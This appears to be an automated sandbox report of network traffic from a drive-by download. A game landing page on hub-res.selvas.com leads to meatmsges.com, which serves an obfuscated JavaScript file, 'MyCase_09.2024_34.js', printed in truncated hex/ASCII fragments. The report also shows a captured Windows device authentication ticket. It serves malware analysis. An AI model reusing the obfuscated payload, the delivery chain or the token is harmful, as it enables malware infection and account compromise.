game FATAL RAID"><meta property="og:url" content="http://hub-res.selvas.com/market/fatalraid/en/hub.html"><meta property="og:title" content="No.1 mobile FPS game FATAL RAID"><meta property="og:image" content="http://hub-res.selvas.com/market/fatalraid/en/img/title.jpg"><meta property="og:description" content="The most realistic gunplay ever!"><meta name="description" content="The most realistic gunplay ever!"><meta http-equiv="X-UA-Compatible" content="IE=edge"></head><body><script>var query = window.location.search.substring(1);var vars = query.split("&");for (var i=0;i<vars.length;i++) {var pair = vars[i].split("=");if(pair[0] == "do

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port
0	192.168.2.6	49715	40.115.3.253	443

Timestamp	Bytes transferred	Direction	Data
2024-10-02 16:44:24 UTC	71	OUT	Data Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 71 75 6a 63 34 69 6a 37 54 30 6d 79 74 51 67 51 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 31 61 34 37 65 38 63 61 31 32 38 36 30 65 62 64 0d 0a 0d 0a Data Ascii: CNT 1 CON 305MS-CV: qujc4ij7T0mytQgQ.1Context: 1a47e8ca12860ebd
2024-10-02 16:44:24 UTC	249	OUT	Data Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
2024-10-02 16:44:24 UTC	1084	OUT	Data Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 71 75 6a 63 34 69 6a 37 54 30 6d 79 74 51 67 51 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 31 61 34 37 65 38 63 61 31 32 38 36 30 65 62 64 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 57 6c 31 66 6c 43 56 36 52 69 75 5a 68 54 67 45 39 71 54 55 53 42 49 30 4c 31 52 33 6c 65 50 46 30 49 45 34 7a 78 61 4d 37 74 7a 56 68 64 36 41 56 42 36 72 2b 75 38 34 55 2f 72 79 2f 72 66 61 6f 6e 6e 42 2b 68 71 56 42 53 39 37 70 48 36 77 51 58 2b 43 58 66 75 34 44 76 4a 6f 43 38 51 54 71 69 36 41 6f 62 5a 72 57 37 6e 39 74 Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: qujc4ij7T0mytQgQ.2Context: 1a47e8ca12860ebd<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAWl1flCV6RiuZhTgE9qTUSBI0L1R3lePF0IE4zxaM7tzVhd6AVB6r+u84U/ry/rfaonnB+hqVBS97pH6wQX+CXfu4DvJoC8QTqi6AobZrW7n9t
2024-10-02 16:44:24 UTC	218	OUT	Data Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 71 75 6a 63 34 69 6a 37 54 30 6d 79 74 51 67 51 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 31 61 34 37 65 38 63 61 31 32 38 36 30 65 62 64 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e Data Ascii: BND 3 CON\WNS 0 197MS-CV: qujc4ij7T0mytQgQ.3Context: 1a47e8ca12860ebd<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
2024-10-02 16:44:24 UTC	14	IN	Data Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a Data Ascii: 202 1 CON 58
2024-10-02 16:44:24 UTC	58	IN	Data Raw: 4d 53 2d 43 56 3a 20 69 44 58 42 51 5a 44 2f 5a 55 47 30 7a 6b 61 65 58 47 68 4e 41 77 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e Data Ascii: MS-CV: iDXBQZD/ZUG0zkaeXGhNAw.0Payload parsing failed.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.6	49721	185.172.129.102	443	4916	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-02 16:44:26 UTC	679	OUT	GET / HTTP/1.1 Host: meatmsges.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: navigate Sec-Fetch-Dest: document Referer: http://hub-res.selvas.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-10-02 16:44:27 UTC	401	IN	HTTP/1.1 200 OK Date: Wed, 02 Oct 2024 16:44:30 GMT Server: Apache/2.4.52 (Ubuntu) Set-Cookie: PHPSESSID=jqrq7dg9q160sr6ultbod07vrg; path=/ Expires: 0 Cache-Control: no-cache, must-revalidate Pragma: public Content-Description: File Transfer Content-Disposition: attachment; filename="MyCase_09.2024_34.js" Content-Length: 405933 Connection: close Content-Type: application/octet-stream
2024-10-02 16:44:27 UTC	16384	IN	Data Raw: 28 66 75 6e 63 74 69 6f 6e 28 5f 30 78 62 32 33 62 38 31 2c 5f 30 78 35 61 65 63 30 63 29 7b 76 61 72 20 5f 30 78 31 37 62 61 39 32 3d 5f 30 78 32 65 39 39 2c 5f 30 78 38 33 34 32 3d 5f 30 78 62 32 33 62 38 31 28 29 3b 77 68 69 6c 65 28 21 21 5b 5d 29 7b 74 72 79 7b 76 61 72 20 5f 30 78 31 34 35 62 65 30 3d 2d 70 61 72 73 65 49 6e 74 28 5f 30 78 31 37 62 61 39 32 28 30 78 34 66 30 29 29 2f 28 30 78 31 63 31 36 2b 30 78 31 64 2a 30 78 35 30 2b 2d 30 78 32 35 2a 30 78 31 30 31 29 2b 2d 70 61 72 73 65 49 6e 74 28 5f 30 78 31 37 62 61 39 32 28 30 78 39 62 38 29 29 2f 28 30 78 37 2a 30 78 35 34 61 2b 2d 30 78 31 2a 30 78 31 32 65 61 2b 2d 30 78 31 32 31 61 29 2a 28 70 61 72 73 65 49 6e 74 28 5f 30 78 31 37 62 61 39 32 28 30 78 34 61 61 29 29 2f 28 2d 30 78 34 Data Ascii: (function(_0xb23b81,_0x5aec0c){var _0x17ba92=_0x2e99,_0x8342=_0xb23b81();while(!![]){try{var _0x145be0=-parseInt(_0x17ba92(0x4f0))/(0x1c16+0x1d0x50+-0x250x101)+-parseInt(_0x17ba92(0x9b8))/(0x70x54a+-0x10x12ea+-0x121a)*(parseInt(_0x17ba92(0x4aa))/(-0x4
2024-10-02 16:44:27 UTC	16384	IN	Data Raw: 65 74 75 72 6e 20 5f 30 78 32 38 37 66 32 30 28 5f 30 78 33 30 34 65 63 61 29 3b 7d 2c 27 58 55 4d 63 65 27 3a 66 75 6e 63 74 69 6f 6e 28 5f 30 78 33 33 36 31 36 32 2c 5f 30 78 35 30 33 38 65 31 29 7b 72 65 74 75 72 6e 20 5f 30 78 33 33 36 31 36 32 2b 5f 30 78 35 30 33 38 65 31 3b 7d 2c 27 4e 50 54 76 78 27 3a 66 75 6e 63 74 69 6f 6e 28 5f 30 78 34 62 35 64 30 64 2c 5f 30 78 31 38 62 63 39 64 29 7b 72 65 74 75 72 6e 20 5f 30 78 34 62 35 64 30 64 2b 5f 30 78 31 38 62 63 39 64 3b 7d 2c 27 4a 57 6f 4b 73 27 3a 66 75 6e 63 74 69 6f 6e 28 5f 30 78 31 64 36 39 38 61 2c 5f 30 78 33 63 35 31 35 34 29 7b 72 65 74 75 72 6e 20 5f 30 78 31 64 36 39 38 61 2a 5f 30 78 33 63 35 31 35 34 3b 7d 2c 27 45 54 65 49 52 27 3a 66 75 6e 63 74 69 6f 6e 28 5f 30 78 32 38 36 36 39 Data Ascii: eturn _0x287f20(_0x304eca);},'XUMce':function(_0x336162,_0x5038e1){return _0x336162+_0x5038e1;},'NPTvx':function(_0x4b5d0d,_0x18bc9d){return _0x4b5d0d+_0x18bc9d;},'JWoKs':function(_0x1d698a,_0x3c5154){return _0x1d698a*_0x3c5154;},'ETeIR':function(_0x28669
2024-10-02 16:44:27 UTC	16384	IN	Data Raw: 34 31 39 65 30 63 28 30 78 36 63 65 29 5d 28 2d 28 30 78 31 2a 2d 30 78 31 35 35 63 2b 2d 30 78 64 2a 2d 30 78 32 37 37 2b 2d 30 78 32 2a 30 78 63 35 29 2c 2d 30 78 31 66 30 61 2b 30 78 33 38 31 2b 30 78 31 62 38 61 29 2c 2d 28 30 78 32 38 35 2b 30 78 31 65 31 36 2b 2d 30 78 31 63 32 30 29 29 2c 30 78 31 2a 30 78 31 33 38 35 2b 2d 30 78 34 2a 30 78 31 37 66 2b 30 78 31 2a 30 78 32 33 29 29 29 29 2c 5f 30 78 33 61 36 36 32 39 5b 5f 30 78 33 30 36 35 39 61 5b 5f 30 78 34 31 39 65 30 63 28 30 78 36 64 31 29 5d 28 5f 30 78 32 64 35 38 34 38 2c 2d 30 78 34 35 2a 2d 30 78 36 35 2b 2d 30 78 33 65 2a 30 78 36 36 2b 30 78 31 2a 2d 30 78 31 31 35 29 5d 28 2d 5f 30 78 33 61 36 36 32 39 5b 5f 30 78 33 30 36 35 39 61 5b 5f 30 78 34 31 39 65 30 63 28 30 78 33 65 34 29 Data Ascii: 419e0c(0x6ce)](-(0x1-0x155c+-0xd-0x277+-0x20xc5),-0x1f0a+0x381+0x1b8a),-(0x285+0x1e16+-0x1c20)),0x10x1385+-0x40x17f+0x10x23)))),_0x3a6629[_0x30659a[_0x419e0c(0x6d1)](_0x2d5848,-0x45-0x65+-0x3e0x66+0x1*-0x115)](-_0x3a6629[_0x30659a[_0x419e0c(0x3e4)
2024-10-02 16:44:27 UTC	16384	IN	Data Raw: 30 78 34 65 37 39 32 64 5b 5f 30 78 35 32 38 66 32 38 28 30 78 32 30 64 29 5d 2c 5f 30 78 34 65 37 39 32 64 5b 5f 30 78 35 32 38 66 32 38 28 30 78 36 34 36 29 5d 2c 5f 30 78 34 65 37 39 32 64 5b 5f 30 78 35 32 38 66 32 38 28 30 78 38 62 65 29 5d 2c 5f 30 78 34 65 37 39 32 64 5b 5f 30 78 35 32 38 66 32 38 28 30 78 37 64 35 29 5d 2c 5f 30 78 34 65 37 39 32 64 5b 5f 30 78 35 32 38 66 32 38 28 30 78 31 35 34 29 5d 2c 5f 30 78 34 65 37 39 32 64 5b 5f 30 78 35 32 38 66 32 38 28 30 78 34 63 35 29 5d 2c 5f 30 78 34 65 37 39 32 64 5b 5f 30 78 35 32 38 66 32 38 28 30 78 38 35 62 29 5d 2c 5f 30 78 34 65 37 39 32 64 5b 5f 30 78 35 32 38 66 32 38 28 30 78 32 38 62 29 5d 2c 5f 30 78 34 65 37 39 32 64 5b 5f 30 78 35 32 38 66 32 38 28 30 78 37 39 66 29 5d 2c 5f 30 78 34 Data Ascii: 0x4e792d[_0x528f28(0x20d)],_0x4e792d[_0x528f28(0x646)],_0x4e792d[_0x528f28(0x8be)],_0x4e792d[_0x528f28(0x7d5)],_0x4e792d[_0x528f28(0x154)],_0x4e792d[_0x528f28(0x4c5)],_0x4e792d[_0x528f28(0x85b)],_0x4e792d[_0x528f28(0x28b)],_0x4e792d[_0x528f28(0x79f)],_0x4
2024-10-02 16:44:27 UTC	16384	IN	Data Raw: 78 38 33 36 35 37 34 29 7b 72 65 74 75 72 6e 20 5f 30 78 33 39 38 33 63 62 2a 5f 30 78 38 33 36 35 37 34 3b 7d 2c 27 64 42 72 46 5a 27 3a 66 75 6e 63 74 69 6f 6e 28 5f 30 78 31 32 31 39 64 33 2c 5f 30 78 39 63 66 64 63 32 29 7b 72 65 74 75 72 6e 20 5f 30 78 31 32 31 39 64 33 2a 5f 30 78 39 63 66 64 63 32 3b 7d 2c 27 62 56 4c 7a 54 27 3a 66 75 6e 63 74 69 6f 6e 28 5f 30 78 33 61 36 33 33 32 2c 5f 30 78 33 65 65 38 31 30 29 7b 72 65 74 75 72 6e 20 5f 30 78 33 61 36 33 33 32 2b 5f 30 78 33 65 65 38 31 30 3b 7d 2c 27 78 57 45 78 54 27 3a 66 75 6e 63 74 69 6f 6e 28 5f 30 78 35 66 34 36 62 35 2c 5f 30 78 31 63 61 34 62 32 29 7b 72 65 74 75 72 6e 20 5f 30 78 35 66 34 36 62 35 2b 5f 30 78 31 63 61 34 62 32 3b 7d 2c 27 6d 41 68 4a 7a 27 3a 66 75 6e 63 74 69 6f 6e Data Ascii: x836574){return _0x3983cb_0x836574;},'dBrFZ':function(_0x1219d3,_0x9cfdc2){return _0x1219d3_0x9cfdc2;},'bVLzT':function(_0x3a6332,_0x3ee810){return _0x3a6332+_0x3ee810;},'xWExT':function(_0x5f46b5,_0x1ca4b2){return _0x5f46b5+_0x1ca4b2;},'mAhJz':function
2024-10-02 16:44:27 UTC	16384	IN	Data Raw: 63 37 34 61 66 5b 5f 30 78 32 30 34 33 36 35 28 30 78 31 30 33 29 5d 28 5f 30 78 35 38 35 38 61 39 2c 30 78 34 39 2a 2d 30 78 38 2b 30 78 31 63 36 2a 2d 30 78 31 33 2b 30 78 32 37 32 32 29 5d 28 5f 30 78 32 30 65 66 66 33 2c 5f 30 78 32 63 37 34 61 66 5b 5f 30 78 32 30 34 33 36 35 28 30 78 31 62 33 29 5d 28 5f 30 78 32 63 37 34 61 66 5b 5f 30 78 32 30 34 33 36 35 28 30 78 32 37 36 29 5d 28 2d 30 78 31 34 34 35 2b 30 78 31 37 66 35 2b 2d 30 78 33 35 31 2c 2d 30 78 32 2a 2d 30 78 31 31 38 33 2b 30 78 64 39 31 2b 2d 30 78 32 30 30 39 29 2c 5f 30 78 32 63 37 34 61 66 5b 5f 30 78 32 30 34 33 36 35 28 30 78 38 61 63 29 5d 28 2d 28 30 78 32 32 66 37 2b 30 78 31 66 61 66 2a 30 78 31 2b 30 78 31 2a 2d 30 78 34 32 61 31 29 2c 2d 30 78 31 39 30 2b 30 78 31 2a 2d 30 Data Ascii: c74af[_0x204365(0x103)](_0x5858a9,0x49-0x8+0x1c6-0x13+0x2722)](_0x20eff3,_0x2c74af[_0x204365(0x1b3)](_0x2c74af[_0x204365(0x276)](-0x1445+0x17f5+-0x351,-0x2-0x1183+0xd91+-0x2009),_0x2c74af[_0x204365(0x8ac)](-(0x22f7+0x1faf0x1+0x1-0x42a1),-0x190+0x1-0
2024-10-02 16:44:27 UTC	16384	IN	Data Raw: 37 28 5f 30 78 38 66 30 32 32 2c 5f 30 78 34 36 36 38 30 61 29 7b 76 61 72 20 5f 30 78 33 38 35 62 61 32 3d 5f 30 78 32 65 39 39 2c 5f 30 78 34 66 38 61 66 61 3d 7b 27 41 55 6d 76 7a 27 3a 66 75 6e 63 74 69 6f 6e 28 5f 30 78 35 33 66 31 61 32 2c 5f 30 78 34 39 31 66 32 32 29 7b 72 65 74 75 72 6e 20 5f 30 78 35 33 66 31 61 32 2d 5f 30 78 34 39 31 66 32 32 3b 7d 2c 27 58 6f 67 65 57 27 3a 66 75 6e 63 74 69 6f 6e 28 5f 30 78 61 61 63 62 35 66 29 7b 72 65 74 75 72 6e 20 5f 30 78 61 61 63 62 35 66 28 29 3b 7d 2c 27 70 57 50 49 66 27 3a 66 75 6e 63 74 69 6f 6e 28 5f 30 78 31 65 32 31 39 66 2c 5f 30 78 35 38 33 63 33 62 2c 5f 30 78 34 39 37 38 62 65 29 7b 72 65 74 75 72 6e 20 5f 30 78 31 65 32 31 39 66 28 5f 30 78 35 38 33 63 33 62 2c 5f 30 78 34 39 37 38 62 65 Data Ascii: 7(_0x8f022,_0x46680a){var _0x385ba2=_0x2e99,_0x4f8afa={'AUmvz':function(_0x53f1a2,_0x491f22){return _0x53f1a2-_0x491f22;},'XogeW':function(_0xaacb5f){return _0xaacb5f();},'pWPIf':function(_0x1e219f,_0x583c3b,_0x4978be){return _0x1e219f(_0x583c3b,_0x4978be
2024-10-02 16:44:27 UTC	16384	IN	Data Raw: 72 65 74 75 72 6e 20 5f 30 78 34 33 39 31 38 37 5b 5f 30 78 32 39 34 37 34 33 28 30 78 39 31 30 29 5d 28 5f 30 78 35 38 62 33 32 38 2c 5f 30 78 64 61 62 33 37 31 29 3b 7d 2c 27 44 6d 61 78 54 27 3a 66 75 6e 63 74 69 6f 6e 28 5f 30 78 38 37 35 62 65 64 2c 5f 30 78 34 35 31 30 33 36 29 7b 76 61 72 20 5f 30 78 61 62 36 37 61 66 3d 5f 30 78 32 65 39 39 3b 72 65 74 75 72 6e 20 5f 30 78 34 33 39 31 38 37 5b 5f 30 78 61 62 36 37 61 66 28 30 78 39 33 62 29 5d 28 5f 30 78 38 37 35 62 65 64 2c 5f 30 78 34 35 31 30 33 36 29 3b 7d 2c 27 5a 54 7a 4c 5a 27 3a 66 75 6e 63 74 69 6f 6e 28 5f 30 78 34 39 39 63 31 36 2c 5f 30 78 38 34 66 34 36 32 29 7b 76 61 72 20 5f 30 78 34 38 65 32 36 61 3d 5f 30 78 32 65 39 39 3b 72 65 74 75 72 6e 20 5f 30 78 34 33 39 31 38 37 5b 5f 30 Data Ascii: return _0x439187[_0x294743(0x910)](_0x58b328,_0xdab371);},'DmaxT':function(_0x875bed,_0x451036){var _0xab67af=_0x2e99;return _0x439187[_0xab67af(0x93b)](_0x875bed,_0x451036);},'ZTzLZ':function(_0x499c16,_0x84f462){var _0x48e26a=_0x2e99;return _0x439187[_0
2024-10-02 16:44:27 UTC	16384	IN	Data Raw: 78 32 38 37 2a 2d 30 78 61 2b 30 78 61 2a 30 78 34 36 31 29 5d 28 5f 30 78 34 32 39 37 38 66 2c 5f 30 78 34 33 39 31 38 37 5b 5f 30 78 62 38 30 38 32 62 28 30 78 61 65 39 29 5d 28 5f 30 78 34 33 39 31 38 37 5b 5f 30 78 62 38 30 38 32 62 28 30 78 61 34 30 29 5d 28 30 78 31 34 62 62 2a 30 78 33 2b 30 78 31 2a 2d 30 78 34 30 36 66 2b 2d 30 78 32 32 66 31 2a 2d 30 78 31 2c 30 78 64 38 36 2b 30 78 32 2a 2d 30 78 37 32 37 2b 30 78 32 36 32 66 29 2c 2d 28 30 78 34 31 32 39 2b 30 78 34 34 32 36 2a 30 78 32 2b 2d 30 78 38 34 66 37 29 29 29 5d 2c 5f 30 78 31 34 36 66 31 34 5b 5f 30 78 33 30 33 38 37 37 5b 5f 30 78 34 33 39 31 38 37 5b 5f 30 78 62 38 30 38 32 62 28 30 78 62 30 32 29 5d 28 5f 30 78 35 31 30 32 30 32 2c 30 78 31 2a 2d 30 78 32 33 66 65 2b 2d 30 78 31 Data Ascii: x287-0xa+0xa0x461)](_0x42978f,_0x439187[_0xb8082b(0xae9)](_0x439187[_0xb8082b(0xa40)](0x14bb0x3+0x1-0x406f+-0x22f1-0x1,0xd86+0x2-0x727+0x262f),-(0x4129+0x44260x2+-0x84f7)))],_0x146f14[_0x303877[_0x439187[_0xb8082b(0xb02)](_0x510202,0x1-0x23fe+-0x1
2024-10-02 16:44:27 UTC	16384	IN	Data Raw: 66 75 6e 63 74 69 6f 6e 28 5f 30 78 35 39 66 63 62 65 2c 5f 30 78 33 36 36 34 65 37 29 7b 72 65 74 75 72 6e 20 5f 30 78 35 39 66 63 62 65 28 5f 30 78 33 36 36 34 65 37 29 3b 7d 2c 27 62 65 42 78 4d 27 3a 66 75 6e 63 74 69 6f 6e 28 5f 30 78 32 66 62 64 32 62 2c 5f 30 78 34 34 30 61 33 36 29 7b 72 65 74 75 72 6e 20 5f 30 78 32 66 62 64 32 62 28 5f 30 78 34 34 30 61 33 36 29 3b 7d 2c 27 54 63 7a 56 6d 27 3a 66 75 6e 63 74 69 6f 6e 28 5f 30 78 31 33 66 38 35 32 2c 5f 30 78 34 30 63 32 39 61 29 7b 72 65 74 75 72 6e 20 5f 30 78 31 33 66 38 35 32 28 5f 30 78 34 30 63 32 39 61 29 3b 7d 2c 27 55 4c 6f 77 6c 27 3a 66 75 6e 63 74 69 6f 6e 28 5f 30 78 39 37 31 39 34 39 2c 5f 30 78 33 31 33 32 62 36 29 7b 72 65 74 75 72 6e 20 5f 30 78 39 37 31 39 34 39 28 5f 30 78 33 Data Ascii: function(_0x59fcbe,_0x3664e7){return _0x59fcbe(_0x3664e7);},'beBxM':function(_0x2fbd2b,_0x440a36){return _0x2fbd2b(_0x440a36);},'TczVm':function(_0x13f852,_0x40c29a){return _0x13f852(_0x40c29a);},'ULowl':function(_0x971949,_0x3132b6){return _0x971949(_0x3

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.6	49723	184.28.90.27	443

Timestamp	Bytes transferred	Direction	Data
2024-10-02 16:44:28 UTC	161	OUT	HEAD /fs/windows/config.json HTTP/1.1 Connection: Keep-Alive Accept: / Accept-Encoding: identity User-Agent: Microsoft BITS/7.8 Host: fs.microsoft.com
2024-10-02 16:44:28 UTC	466	IN	HTTP/1.1 200 OK Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json Content-Type: application/octet-stream ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7" Last-Modified: Tue, 16 May 2017 22:58:00 GMT Server: ECAcc (lpl/EF06) X-CID: 11 X-Ms-ApiVersion: Distribute 1.2 X-Ms-Region: prod-neu-z1 Cache-Control: public, max-age=86482 Date: Wed, 02 Oct 2024 16:44:28 GMT Connection: close X-CID: 2

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.6	49724	184.28.90.27	443

Timestamp	Bytes transferred	Direction	Data
2024-10-02 16:44:29 UTC	239	OUT	GET /fs/windows/config.json HTTP/1.1 Connection: Keep-Alive Accept: / Accept-Encoding: identity If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT Range: bytes=0-2147483646 User-Agent: Microsoft BITS/7.8 Host: fs.microsoft.com
2024-10-02 16:44:29 UTC	514	IN	HTTP/1.1 200 OK ApiVersion: Distribute 1.1 Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json Content-Type: application/octet-stream ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7" Last-Modified: Tue, 16 May 2017 22:58:00 GMT Server: ECAcc (lpl/EF06) X-CID: 11 X-Ms-ApiVersion: Distribute 1.2 X-Ms-Region: prod-weu-z1 Cache-Control: public, max-age=86425 Date: Wed, 02 Oct 2024 16:44:29 GMT Content-Length: 55 Connection: close X-CID: 2
2024-10-02 16:44:29 UTC	55	IN	Data Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

Session ID	Source IP	Source Port	Destination IP	Destination Port
4	192.168.2.6	49725	40.115.3.253	443

Timestamp	Bytes transferred	Direction	Data
2024-10-02 16:44:32 UTC	71	OUT	Data Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 69 6a 4a 5a 5a 52 39 4e 56 30 57 31 73 2f 31 59 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 63 64 31 33 37 62 61 35 63 31 66 62 35 32 63 31 0d 0a 0d 0a Data Ascii: CNT 1 CON 305MS-CV: ijJZZR9NV0W1s/1Y.1Context: cd137ba5c1fb52c1
2024-10-02 16:44:32 UTC	249	OUT	Data Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
2024-10-02 16:44:32 UTC	1084	OUT	Data Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 69 6a 4a 5a 5a 52 39 4e 56 30 57 31 73 2f 31 59 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 63 64 31 33 37 62 61 35 63 31 66 62 35 32 63 31 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 57 6c 31 66 6c 43 56 36 52 69 75 5a 68 54 67 45 39 71 54 55 53 42 49 30 4c 31 52 33 6c 65 50 46 30 49 45 34 7a 78 61 4d 37 74 7a 56 68 64 36 41 56 42 36 72 2b 75 38 34 55 2f 72 79 2f 72 66 61 6f 6e 6e 42 2b 68 71 56 42 53 39 37 70 48 36 77 51 58 2b 43 58 66 75 34 44 76 4a 6f 43 38 51 54 71 69 36 41 6f 62 5a 72 57 37 6e 39 74 Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: ijJZZR9NV0W1s/1Y.2Context: cd137ba5c1fb52c1<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAWl1flCV6RiuZhTgE9qTUSBI0L1R3lePF0IE4zxaM7tzVhd6AVB6r+u84U/ry/rfaonnB+hqVBS97pH6wQX+CXfu4DvJoC8QTqi6AobZrW7n9t
